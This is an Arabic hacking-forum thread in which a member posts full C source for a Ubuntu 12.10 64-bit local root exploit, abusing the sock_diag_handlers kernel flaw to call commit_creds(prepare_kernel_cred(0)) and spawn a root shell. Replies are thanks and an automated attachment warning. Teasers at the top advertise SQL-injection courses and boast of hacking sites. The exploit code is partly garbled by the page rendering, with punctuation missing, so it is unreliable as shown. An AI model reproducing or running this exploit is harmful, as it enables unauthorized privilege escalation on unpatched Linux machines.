1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

Ubuntu 12.10 64bit Local Root

الموضوع في 'قسم اللوكال رووت Local Root' بواسطة Scorpion, بتاريخ ‏21 ابريل 2013.

كاتب الموضوع : Scorpion المشاهدات : 1,194 الردود : 3 ‏21 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Scorpion
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    Welcome to all members IQ-TEAM
    Local Root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[]
    vulnerability in Linux kernels before 3.7.10.
    كود PHP:
    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlersnl_table;

    int __attribute__((regparm(3)))
    x()
    {
      
    commit_creds(prepare_kernel_cred(0));
      return -
    1;
    }

    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    int main() {
      
    int fd;
        
    unsigned long mmap_startmmap_size 0x10000;
      
    unsigned family;
      
    struct {
        
    struct nlmsghdr nlh;
        
    struct unix_diag_req r;
      } 
    req;
      
    char  buf[8192];

      if ((
    fd socket(AF_NETLINKSOCK_RAWNETLINK_SOCK_DIAG)) < 0){
        
    printf("Can't create sock diag socket\n");
        return -
    1;
      }

      
    memset(&req0sizeof(req));
      
    req.nlh.nlmsg_len sizeof(req);
      
    req.nlh.nlmsg_type SOCK_DIAG_BY_FAMILY;
      
    req.nlh.nlmsg_flags NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
      
    req.nlh.nlmsg_seq 123456;

      
    req.r.udiag_states = -1;
      
    req.r.udiag_show UDIAG_SHOW_NAME UDIAG_SHOW_PEER UDIAG_SHOW_RQLEN;

      
    /* Ubuntu 12.10 x86_64 */
      
    req.r.sdiag_family 0x37;
      
    commit_creds = (_commit_creds0xffffffff8107d180;
      
    prepare_kernel_cred = (_prepare_kernel_cred0xffffffff8107d410;
        
    mmap_start 0x1a000;

        if (
    mmap((void*)mmap_startmmap_sizePROT_READ|PROT_WRITE|PROT_EXEC,
        
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {

        
    printf("mmap fault\n");
        exit(
    1);
        }

        *(
    unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        
    memset((void *)mmap_start0x90mmap_size);
        
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1sizeof(stage1));

      
    send(fd, &reqsizeof(req), 0);
      if(!
    getuid())
        
    system("/bin/sh");
    }
     

    الملفات المرفقة:

    • ubuntu.txt
      حجم الملف:
      2 ك. ب
      المشاهدات:
      0


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    Ṁŕ Ĕĺ Ķińĝ
    rank
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Ubuntu 12.10 64bit Local Root

    يعطيك العآفية يـ بطل , دمت بخير
     


  4. غير متصل

    ÍяâΘ
    rankrank
    Developer

    عضو منذ:
    ‏30 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Ubuntu 12.10 64bit Local Root

    وِعليّكم آلسًسًسًلآم وِرحًمة ٱللۂ وِبّركـآتُۂ

    يّعطٌيّك آلعـآفُيّۂ آخٌيّ

    فُيّ آمـآنٌ ٱللۂ
    :{12}: ​
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...